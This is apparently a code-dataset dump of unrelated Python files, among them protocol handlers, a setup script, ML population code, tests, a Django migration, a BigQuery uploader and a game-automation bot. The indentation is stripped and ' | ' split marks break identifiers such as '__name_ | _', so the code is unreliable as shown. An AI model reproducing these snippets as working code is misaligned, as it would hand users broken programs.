raise UUSSProtocolException("ReleaseLock.game (%r) != GetRequest.game (%r)" % (req.game, get_req.game))
if req.user_id != get_req.user_id:
raise UUSSProtocolException("ReleaseLock.user_id (%r) != GetRequest.user_id (%r)" % (req.user_id, get_req.user_id))
with get_processor_for_message(req, version).get_response(protocol, req, config) as resp:
protocol.send_message(resp, version)
if req.__class__ is ReleaseLock:
log.debug("Get._wait_for_release_lock end (%r, %r)", get_req.user_id, req.game)
return
def _build_response(self, state, chunked, game, user_id):
if not chunked:
# get the state in a chunked format for sending along the wire
# there will be only a master chunk with no chunk config specified
state = chunking.blow_chunks(state)
resp = self.Response()
resp.game = game
resp.user_id = user_id
if state is None:
resp.state = ""
else:
resp.state = state
return resp
class Save(UUSSAction):
def __init__(self):
self.Request = SaveRequest
self.Response = SaveResponse
@contextlib.contextmanager
def _call(self, protocol, userstate, req, config):
log.debug("Save._call start (%r, %r)", req.user_id, req.game)
userstate.save(req.user_id, req.state)
resp = self.Response()
resp.game = req.game
resp.user_id = req.user_id
yield resp
log.debug("Save._call end (%r, %r)", req.user_id, req.game)
class Lock(UUSSAction):
def __init__(self):
self.Request = ReleaseLock
self.Response = LockReleased
@contextlib.contextmanager
def _call(self, protocol, userstate, req, config):
log.debug("Lock._call start (%r, %r)", req.user_id, req.game)
resp = self.Response()
resp.game = req.game
resp.user_id = req.user_id
log.debug("Lock._call pre-yield (%r, %r)", req.user_id, req.game)
yield resp
log.debug("Lock._call post-yield (%r, %r)", req.user_id, req.game)
log.debug("Lock._call end (%r, %r)", req.user_id, req.game)
class Delete(UUSSAction):
def __init__(self):
self.Request = DeleteRequest
self.Response = DeleteResponse
@contextlib.contextmanager
def _call(self, protocol, userstate, req, config):
if userstate.is_remote:
raise UUSSProtocolException(
"DeleteRequest sent for user_id %r game %r but that game is remote. I will only delete userstates in my local games."
% (req.user_id, req.game))
with userstate.open(req.user_id, label='UUSS.Delete') as state:
log.warn("[w:delete_userstate] Deleting userstate for user_id %r game %r, state follows\n%s", req.user_id, req.game, json.dumps(state))
userstate.delete(req.user_id)
resp = self.Response()
resp.game = req.game
resp.user_id = req.user_id
yield resp
## UUMS protocol ##
class GetMessages(UUSSAction):
def __init__(self):
self.Request = GetMessagesRequest
self.Response = GetMessagesResponse
@contextlib.contextmanager
def _call(self, protocol, userstate, req, config):
log.debug("GetMessages._call start (%r, %r)", req.user_id, req.game)
resp = self.Response()
resp.game = req.game
resp.user_id = req.user_id
resp.messages.extend([ simplejson.dumps(m) for m in userstate.get_messages(req.user_id) ])
log.debug("GetMessages._call pre-yield (%r, %r)", req.user_id, req.game)
yield resp
log.debug("GetMessages._ca |
azon1272/War-for-cookies-v2 | game_window.py | Python | bsd-3-clause | 114 | 0.017544 | from lib.lib_game import Window
if __name_ | _ == '__main__':
a = Window('first | _map_for_test')
a.Run()
|
audiencepi/SimilarWeb-Python | setup.py | Python | mit | 1,247 | 0 | from setuptools import find_packages
from setuptools import setup
import io
import os
VERSION = '0.0.3'
def fpath(name):
return os.path.join(os.path.dirname(__file__), name)
def read(*filenames, **kwargs):
encoding = kwargs.get('encoding', 'utf-8')
sep = kwargs.get('sep', '\n')
buf = []
for filename in filenames:
with io.open(fpath(filename), encoding=encoding) as f:
buf.append(f.read())
return sep.join(buf)
def get_requirements():
return [line.rstrip('\n') for line in open(fpath('requirements.txt'))]
setup_args = dict(
name='SimilarWeb-Python',
description='Python Wrapper for SimilarWeb API',
url='https://github.com/audiencepi/SimilarWeb-Python',
version=VERSION,
license='MIT',
packages=find_packages(exclude=['tests']),
include_package_data=True,
install_requires=get_requirements(),
author='Ryan Liao',
author_email='pirsquare.ryan@gma | il.com',
classifiers=[
| 'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
],
)
if __name__ == '__main__':
setup(**setup_args)
|
CoderBotOrg/coderbot | stub/picamera/camera.py | Python | gpl-2.0 | 113 | 0.00885 | from test.picamera_mock impor | t PiCameraMock as PiCamera
class array(object):
def __init(s | elf):
pass
|
mgraffg/RGP | EvoDAG/population.py | Python | apache-2.0 | 18,497 | 0.000378 | # Copyright 2015 Mario Graff Guerrero
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import numpy as np
from .node import Function, NaiveBayes, NaiveBayesMN, MultipleVariables, Centroid
from .model import Model
from .cython_utils import SelectNumbers
import gc
class Inputs(object):
def __init__(self, base, vars, functions=None):
self._base = base
self._vars = vars
self._unique_individuals = set()
if functions is None:
self._funcs = [NaiveBayes, NaiveBayesMN, MultipleVariables, Centroid]
else:
self._funcs = functions
assert len(self._funcs) <= 4
c = base._classifier
tag = 'classification' if c else 'regression'
self._funcs = [x for x in self._funcs if getattr(x, tag)]
self.functions()
self._all_variables_index = 0
def use_all_variables(self):
return self._base._use_all_vars_input_functions and self._base.nvar > 1 and self._all_variables_index < self._nfunc
def all_variables(self):
f = self._func[self._all_variables_index]
self._all_variables_index += 1
base = self._base
unique_individuals = self._unique_individuals
v = f([x for x in range(base.nvar)],
| ytr=base._ytr, nai | ve_bayes=base.naive_bayes,
finite=base._finite, mask=base._mask)
sig = v.signature()
unique_individuals.add(sig)
v.height = 0
if not v.eval(base.X):
return None
if not v.isfinite():
return None
if not base._bagging_fitness.set_fitness(v):
return None
return v
def functions(self):
base = self._base
density = sum([x.hy.density for x in base.X]) / base.nvar
# func = [x for x in self._funcs if x.nargs > 0]
func = self._funcs
if not len(func):
self._func = None
self._nfunc = 0
return
if density < self._base._min_density:
func = [x for x in func if x.density_safe]
self._nfunc = len(func)
self._func = func
def function(self):
if self._nfunc == 1:
return self._func
elif self._nfunc == 2:
if np.random.random() < 0.5:
return self._func
return [self._func[1], self._func[0]]
elif self._nfunc == 3:
rnd = np.random.random()
if rnd < 0.3:
return self._func
elif rnd < 0.6:
return [self._func[1], self._func[0], self._func[2]]
else:
return [self._func[2], self._func[0], self._func[1]]
else:
func = [x for x in self._func]
np.random.shuffle(func)
return func
def input(self):
base = self._base
unique_individuals = self._unique_individuals
vars = self._vars
if self._nfunc == 0:
return None
for _ in range(base._number_tries_feasible_ind):
args = []
func = self.function()
for f in func:
nargs = f.nargs
if len(args):
vars.pos -= len(args)
if vars.empty():
return None
args = vars.get(nargs)
if len(args) < f.min_nargs:
return None
v = f(args,
ytr=base._ytr, naive_bayes=base.naive_bayes,
finite=base._finite, mask=base._mask)
sig = v.signature()
if sig in unique_individuals:
continue
unique_individuals.add(sig)
v.height = 0
if not v.eval(base.X):
continue
if not v.isfinite():
continue
if not base._bagging_fitness.set_fitness(v):
continue
return v
return None
class BasePopulation(object):
def __init__(self, base=None,
tournament_size=2,
classifier=True,
labels=None,
popsize=10000,
random_generations=0,
es_extra_test=lambda x: True,
negative_selection=True):
self._base = base
self._p = []
self._hist = []
self._bsf = None
self._estopping = None
self._tournament_size = tournament_size
self._index = None
self._classifier = classifier
self._es_extra_test = es_extra_test
self._labels = labels
self._logger = logging.getLogger('EvoDAG')
self._previous_estopping = False
self._current_popsize = 0
self._popsize = popsize
self._inds_replace = 0
self.generation = 1
self._random_generations = random_generations
self._density = 0.0
self._negative_selection = negative_selection
@property
def popsize(self):
return self._current_popsize
@property
def population(self):
"List containing the population"
return self._p
@population.setter
def population(self, a):
self._current_popsize = len(a)
self._p = a
@property
def density(self):
return self._density / self.popsize
def get_density(self, v):
try:
return v.hy.density
except AttributeError:
return sum([x.density for x in v.hy]) / len(v.hy)
@property
def previous_estopping(self):
"""
Returns whether the last individual set in the population was
an early stopping individual
"""
return self._previous_estopping
@previous_estopping.setter
def previous_estopping(self, v):
self._previous_estopping = v
@property
def hist(self):
"List containing all the individuals generated"
return self._hist
@property
def bsf(self):
"Best so far"
return self._bsf
@property
def estopping(self):
"Early stopping individual"
return self._estopping
@estopping.setter
def estopping(self, v):
self.previous_estopping = False
if v.fitness_vs is None:
return None
flag = False
if self.estopping is None:
if not self._es_extra_test(v):
return None
self._estopping = v
flag = True
elif v.fitness_vs > self.estopping.fitness_vs:
if not self._es_extra_test(v):
return None
self._estopping = v
flag = True
if flag:
self.previous_estopping = flag
self._base._unfeasible_counter = 0
vfvs = v.fitness_vs
self._logger.info('(%i) ES: %0.4f %0.4f' % (v.position,
v.fitness,
vfvs))
@bsf.setter
def bsf(self, v):
flag = False
if self.bsf is None:
self._bsf = v
flag = True
elif v.fitness > self.bsf.fitness:
self._bsf = v
flag = True
if flag:
if v.fitness_vs is None:
fvs = ""
else:
fvs = "%0.4f" % v.fitness_vs
fts = "%0.4f" % v.fitness
self._logger.debug('(%(position)s) BSF: %(fts)s %(fvs)s',
{'fts': fts, 'fvs': fvs, 'position': v.position})
def model(self, v=None):
"Returns the model of node v"
if v is None:
|
wrobell/geocoon | geocoon/tests/test_sql.py | Python | gpl-3.0 | 1,771 | 0.000565 | #
# GeoCoon - GIS data analysis library based on Pandas and Shapely
#
# Copyright (C) 2014 by Artur | Wroblewski <wrobell@pld-linux.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either versio | n 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from shapely.geometry import Point
from geocoon.sql import read_sql
from geocoon.core import GeoDataFrame, PointSeries
import unittest
from unittest import mock
class SQLTestCase(unittest.TestCase):
"""
Test SQL GeoCoon SQL routines.
"""
@mock.patch('pandas.io.sql.read_sql')
def test_read_sql(self, f_sql):
"""
Test SQL data frame read
"""
points = Point(1, 1), Point(2, 2), Point(3, 3)
data = {
'a': PointSeries([p.wkb for p in points]),
'b': list(range(3)),
}
data = GeoDataFrame(data)
data = data[['a', 'b']]
f_sql.return_value = data
result = read_sql('query', 'con', geom_col='a')
self.assertEqual(PointSeries, type(result.a))
self.assertEqual(Point, type(result.a[0]))
self.assertEqual(3, len(result.index))
self.assertTrue(all([1, 2, 3] == result.a.x))
self.assertTrue(all([1, 2, 3] == result.a.y))
# vim: sw=4:et:ai
|
ai-ku/langvis | jython-2.1/Lib/unittest.py | Python | mit | 25,555 | 0.002465 | #!/usr/bin/env python
'''
Python unit testing framework, based on Erich Gamma's JUnit and Kent Beck's
Smalltalk testing framework.
This module contains the core framework classes that form the basis of
specific test cases and suites (TestCase, TestSuite etc.), and also a
text-based utility class for running the tests and reporting the results
(TextTestRunner).
Simple usage:
import unittest
class IntegerArithmenticTestCase(unittest.TestCase):
def testAdd(self): ## test method names begin 'test*'
self.assertEquals((1 + 2), 3)
self.assertEquals(0 + 1, 1)
def testMultiply(self);
self.assertEquals((0 * 10), 0)
self.assertEquals((5 * 8), 40)
if __name__ == '__main__':
unittest.main()
Further information is available in the bundled documentation, and from
http://pyunit.sourceforge.net/
Copyright (c) 1999, 2000, 2001 Steve Purcell
This module is free software, and you may redistribute it and/or modify
it under the same terms as Python itself, so long as this copyright message
and disclaimer are retained in their original form.
IN NO EVENT SHALL THE AUTHOR BE LIABLE TO ANY PARTY FOR DIRECT, INDIRECT,
SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OF
THIS CODE, EVEN IF THE AUTHOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
DAMAGE.
THE AUTHOR SPECIFICALLY DISCLAIMS ANY WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE. THE CODE PROVIDED HEREUNDER IS ON AN "AS IS" BASIS,
AND THERE IS NO OBLIGATION WHATSOEVER TO PROVIDE MAINTENANCE,
SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
'''
__author__ = "Steve Purcell"
__email__ = "stephen_purcell at yahoo dot com"
__version__ = "$Revision: 1.7 $"[11:-2]
import time
import sys
import traceback
import string
import os
import types
##############################################################################
# Test framework core
##############################################################################
class TestResult:
"""Holder for test result information.
Test results are automatically managed by the TestCase and TestSuite
classes, and do not need to be explicitly manipulated by writers of tests.
Each instance holds the total number of tests run, and collections of
failures and errors that occurred among those test runs. The collections
contain tuples of (testcase, exceptioninfo), where exceptioninfo is a
tuple of values as returned by sys.exc_info().
"""
def __init__(self):
self.failures = []
self.errors = []
self.testsRun = 0
self.shouldStop = 0
def startTest(self, test):
"Called when the given test is about to be run"
self.testsRun = self.testsRun + 1
def stopTest(self, test):
"Called when the given test has been run"
pass
def addError(self, test, err):
"Called when an error has occurred"
self.errors.append((te | st, err))
def addFailure(self, test, err):
"Called when a failure has occurred"
self.failures.append((test, err))
def addSuccess(self, test):
"Called when a test has completed successfully"
pass
def wasSuccessful(self):
"Tells whether or not this result | was a success"
return len(self.failures) == len(self.errors) == 0
def stop(self):
"Indicates that the tests should be aborted"
self.shouldStop = 1
def __repr__(self):
return "<%s run=%i errors=%i failures=%i>" % \
(self.__class__, self.testsRun, len(self.errors),
len(self.failures))
class TestCase:
"""A class whose instances are single test cases.
By default, the test code itself should be placed in a method named
'runTest'.
If the fixture may be used for many test cases, create as
many test methods as are needed. When instantiating such a TestCase
subclass, specify in the constructor arguments the name of the test method
that the instance is to execute.
Test authors should subclass TestCase for their own tests. Construction
and deconstruction of the test's environment ('fixture') can be
implemented by overriding the 'setUp' and 'tearDown' methods respectively.
If it is necessary to override the __init__ method, the base class
__init__ method must always be called. It is important that subclasses
should not change the signature of their __init__ method, since instances
of the classes are instantiated automatically by parts of the framework
in order to be run.
"""
# This attribute determines which exception will be raised when
# the instance's assertion methods fail; test methods raising this
# exception will be deemed to have 'failed' rather than 'errored'
failureException = AssertionError
def __init__(self, methodName='runTest'):
"""Create an instance of the class that will use the named test
method when executed. Raises a ValueError if the instance does
not have a method with the specified name.
"""
try:
self.__testMethodName = methodName
testMethod = getattr(self, methodName)
self.__testMethodDoc = testMethod.__doc__
except AttributeError:
raise ValueError, "no such test method in %s: %s" % \
(self.__class__, methodName)
def setUp(self):
"Hook method for setting up the test fixture before exercising it."
pass
def tearDown(self):
"Hook method for deconstructing the test fixture after testing it."
pass
def countTestCases(self):
return 1
def defaultTestResult(self):
return TestResult()
def shortDescription(self):
"""Returns a one-line description of the test, or None if no
description has been provided.
The default implementation of this method returns the first line of
the specified test method's docstring.
"""
doc = self.__testMethodDoc
return doc and string.strip(string.split(doc, "\n")[0]) or None
def id(self):
return "%s.%s" % (self.__class__, self.__testMethodName)
def __str__(self):
return "%s (%s)" % (self.__testMethodName, self.__class__)
def __repr__(self):
return "<%s testMethod=%s>" % \
(self.__class__, self.__testMethodName)
def run(self, result=None):
return self(result)
def __call__(self, result=None):
if result is None: result = self.defaultTestResult()
result.startTest(self)
testMethod = getattr(self, self.__testMethodName)
try:
try:
self.setUp()
except:
result.addError(self,self.__exc_info())
return
ok = 0
try:
testMethod()
ok = 1
except self.failureException, e:
result.addFailure(self,self.__exc_info())
except:
result.addError(self,self.__exc_info())
try:
self.tearDown()
except:
result.addError(self,self.__exc_info())
ok = 0
if ok: result.addSuccess(self)
finally:
result.stopTest(self)
def debug(self):
"""Run the test without collecting errors in a TestResult"""
self.setUp()
getattr(self, self.__testMethodName)()
self.tearDown()
def __exc_info(self):
"""Return a version of sys.exc_info() with the traceback frame
minimised; usually the top level of the traceback frame is not
needed.
"""
exctype, excvalue, tb = sys.exc_info()
if sys.platform[:4] == 'java': ## tracebacks look different in Jython
return (exct |
OpenTouch/python-facette | src/facette/v1/plot.py | Python | apache-2.0 | 2,559 | 0.008988 | # Copyright (c) 2014 Alcatel-Lucent Enterprise
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from facette.utils import *
from facette.v1.plotserie import PlotSerie
import json
PLOT_ID = "id"
PLOT_NAME = "name"
PLOT_DESCRIPTION = "description"
PLOT_TYPE = "type"
PLOT_SERIES = "series"
PLOT_STACK_MODE = "stack_mode"
PLOT_START = "start"
PLOT_END = "end"
PLOT_STEP = "step"
PLOT_MODIFIED = "modified"
PLOT_UNIT_LABEL = "unit_label"
PLOT_UNIT_TYPE = "unit_type"
GRAPH_TYPE_AREA = 1
GRAPH_TYPE_LINE = 2
STACK_MODE_NONE = 1
STACK_MODE_NORMAL = 2
STACK_MODE_PERCENT = 3
class Plot:
def __init__(self, js=""):
self.plot = {}
self.id = facette_to_json(PLOT_ID, js, self.plot)
self.name = facette_to_json(PLOT_NAME, | js, | self.plot)
self.description = facette_to_json(PLOT_DESCRIPTION, js, self.plot)
self.type = facette_to_json(PLOT_TYPE, js, self.plot)
self.stack_mode = facette_to_json(PLOT_STACK_MODE, js, self.plot)
self.start = facette_to_json(PLOT_START, js, self.plot)
self.end = facette_to_json(PLOT_END, js, self.plot)
self.step = facette_to_json(PLOT_STEP, js, self.plot)
self.modified = facette_to_json(PLOT_MODIFIED, js, self.plot)
self.unit_label = facette_to_json(PLOT_UNIT_LABEL, js, self.plot)
self.unit_type = facette_to_json(PLOT_UNIT_TYPE, js, self.plot)
self.series = []
if js.get(PLOT_SERIES):
for x in js[PLOT_SERIES]:
e = PlotSerie(x)
self.series.append(e)
self.plot[PLOT_SERIES] = self.series
def __str__(self):
js = self.plot
series = []
for s in self.series:
series.append(json.loads(str(s)))
js[PLOT_SERIES] = series
return json.dumps(js)
def __repr__(self):
return str(self)
|
cloudbase/maas | src/maasserver/migrations/0033_component_error.py | Python | agpl-3.0 | 15,078 | 0.007494 | # -*- coding: utf-8 -*-
import datetime
from django.db import models
from south.db import db
from south.v2 import SchemaMigration
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'ComponentError'
db.create_table(u'maasserver_componenterror', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('component', self.gf('django.db.models.fields.CharField')(unique=True, max_length=40)),
('error', self.gf('django.db.models.fields.CharField')(max_length=1000)),
))
db.send_create_signal(u'maasserver', ['ComponentError'])
def backwards(self, orm):
# Deleting model 'ComponentError'
db.delete_table(u'maasserver_componenterror')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'maasserver.bootimage': {
'Meta': {'unique_together': "((u'architecture', u'subarchitecture', u'release', u'purpose'),)", 'object_name': 'BootImage'},
'architecture': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'purpose': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'release': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'subarchitecture': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'maasserver.componenterror': {
'Meta': {'object_name': 'ComponentError'},
'component': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
'error': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'maasserver.config': {
'Meta': {'object_name': 'Config'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'value': ('maasserver.fields.JSONObjectField', [], { | 'null': 'True'})
},
u'maasserver.dhcplease': {
'Meta': {'object_name': 'DHCPLease'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': | 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'unique': 'True', 'max_length': '15'}),
'mac': ('maasserver.fields.MACAddressField', [], {}),
'nodegroup': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['maasserver.NodeGroup']"})
},
u'maasserver.filestorage': {
'Meta': {'object_name': 'FileStorage'},
'data': ('django.db.models.fields.files.FileField', [], {'max_length': '255'}),
'filename': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'maasserver.macaddress': {
'Meta': {'object_name': 'MACAddress'},
'created': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mac_address': ('maasserver.fields.MACAddressField', [], {'unique': 'True'}),
'node': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['maasserver.Node']"}),
'updated': ('django.db.models.fields.DateTimeField', [], {})
},
u'maasserver.node': {
'Meta': {'object_name': 'Node'},
'after_commissioning_action': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'architecture': ('django.db.models.fields.CharField', [], {'default': "u'i386/generic'", 'max_length': '31'}),
'cpu_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {}),
'distro_series': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '10', 'null': 'True', 'blank': 'True'}),
'error': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '255', 'blank': 'True'}),
'hardware_details': ('maasserver.fields.XMLField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'hostname': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'memory': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'netboot': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'nodegroup': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['maasserver.NodeGroup']", 'null': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
|
bazelbuild/bazel-bench | utils/bigquery_upload.py | Python | apache-2.0 | 2,925 | 0.009573 | # Copyright 2019 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http:#www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Handles the uploading of result CSV to BigQuery."""
import re
import sys
import utils.logger as logger
from absl import app
from absl import flags
from google.cloud import bigquery
def upload_to_bigquery(csv_file_path, proj | ect_id, dataset_id, table_id,
location):
"""Uploads the csv file to BigQuery.
Takes the configuration from GOOGLE_APP | LICATION_CREDENTIALS.
Args:
csv_file_path: the path to the csv to be uploaded.
project_id: the BigQuery project id.
dataset_id: the BigQuery dataset id.
table_id: the BigQuery table id.
location: the BigQuery table's location.
"""
logger.log('Uploading the data to bigquery.')
client = bigquery.Client(project=project_id)
dataset_ref = client.dataset(dataset_id)
table_ref = dataset_ref.table(table_id)
job_config = bigquery.LoadJobConfig()
job_config.source_format = bigquery.SourceFormat.CSV
job_config.skip_leading_rows = 1
job_config.autodetect = False
# load table to get schema
table = client.get_table(table_ref)
job_config.schema = table.schema
with open(str(csv_file_path), 'rb') as source_file:
job = client.load_table_from_file(
source_file, table_ref, location=location, job_config=job_config)
try:
job.result() # Waits for table load to complete.
except Exception:
print('Uploading failed with: %s' % str(job.errors))
sys.exit(-1)
logger.log('Uploaded {} rows into {}:{}.'.format(job.output_rows, dataset_id,
table_id))
FLAGS = flags.FLAGS
flags.DEFINE_string('upload_to_bigquery', None,
'The details of the BigQuery table to upload ' \
'results to: <project_id>:<dataset_id>:<table_id>:<location>')
def main(argv):
if not re.match('^[\w-]+:[\w-]+:[\w-]+:[\w-]+$', FLAGS.upload_to_bigquery):
raise ValueError('--upload_to_bigquery should follow the pattern '
'<project_id>:<dataset_id>:<table_id>:<location>.')
# Discard the first argument.
csv_files_to_upload = argv[1:]
project_id, dataset_id, table_id, location = FLAGS.upload_to_bigquery.split(
':')
for filename in csv_files_to_upload:
upload_to_bigquery(filename, project_id, dataset_id, table_id, location)
if __name__ == '__main__':
app.run(main)
|
doofmars/systems_nominal_bot | code.py | Python | mit | 6,584 | 0.092193 | import ImageGrab
import os
import time
import win32api, win32con
import quickGrab
import ImageOps
from numpy import *
"""
All coordinates assume a screen resolution of 1920x1080
And window size of 1280x720
"""
## Globals
#Top left corner of game window
pad_x = 320
pad_y = 171
#Size of window
window_x = 1280
window_y = 720
debug = False #additional debug output
prove = False #Save screenshot of button to proove key for debugging
gameover = False
folder = str(int(time.time()))
#Giant dictonary to hold key name and VK value (from gist https://gist.github.com/chriskiehl/2906125)
VK_CODE = {'backspace':0x08,
'tab':0x09,
'clear':0x0C,
'enter':0x0D,
'shift':0x10,
'ctrl':0x11,
'alt':0x12,
'pause':0x13,
'caps_lock':0x14,
'esc':0x1B,
'spacebar':0x20,
'page_up':0x21,
'page_down':0x22,
'end':0x23,
'home':0x24,
'left_arrow':0x25,
'up_arrow':0x26,
'right_arrow':0x27,
'down_arrow':0x28,
'select':0x29,
'print':0x2A,
'execute':0x2B,
'print_screen':0x2C,
'ins':0x2D,
'del':0x2E,
'help':0x2F,
'0':0x30,
'1':0x31,
'2':0x32,
'3':0x33,
'4':0x34,
'5':0x35,
'6':0x36,
'7':0x37,
'8':0x38,
'9':0x39,
'a':0x41,
'b':0x42,
'c':0x43,
'd':0x44,
'e':0x45,
'f':0x46,
'g':0x47,
'h':0x48,
'i':0x49,
'j':0x4A,
'k':0x4B,
'l':0x4C,
'm':0x4D,
'n':0x4E,
'o':0x4F,
'p':0x50,
'q':0x51,
'r':0x52,
's':0x53,
't':0x54,
'u':0x55,
'v':0x56,
'w':0x57,
'x':0x58,
'y':0x59,
'z':0x5A,
'numpad_0':0x60,
'numpad_1':0x61,
'numpad_2':0x62,
'numpad_3':0x63,
'numpad_4':0x64,
'numpad_5':0x65,
'numpad_6':0x66,
'numpad_7':0x67,
'numpad_8':0x68,
'numpad_9':0x69,
'multiply_key':0x6A,
'add_key':0x6B,
'separator_key':0x6C,
'subtract_key':0x6D,
'decimal_key':0x6E,
'divide_key':0x6F,
'F1':0x70,
'F2':0x71,
'F3':0x72,
'F4':0x73,
'F5':0x74,
'F6':0x75,
'F7':0x76,
'F8':0x77,
'F9':0x78,
'F10':0x79,
'F11':0x7A,
'F12':0x7B,
'F13':0x7C,
'F14':0x7D,
'F15':0x7E,
'F16':0x7F,
'F17':0x80,
'F18':0x81,
'F19':0x82,
'F20':0x83,
'F21':0x84,
'F22':0x85,
'F23':0x86,
'F24':0x87,
'num_lock':0x90,
'scroll_lock':0x91,
'left_shift':0xA0,
'right_shift ':0xA1,
'left_control':0xA2,
'right_control':0xA3,
'left_menu':0xA4,
'right_menu':0xA5,
'browser_back':0xA6,
'browser_forward':0xA7,
'browser_refresh':0xA8,
'browser_stop':0xA9,
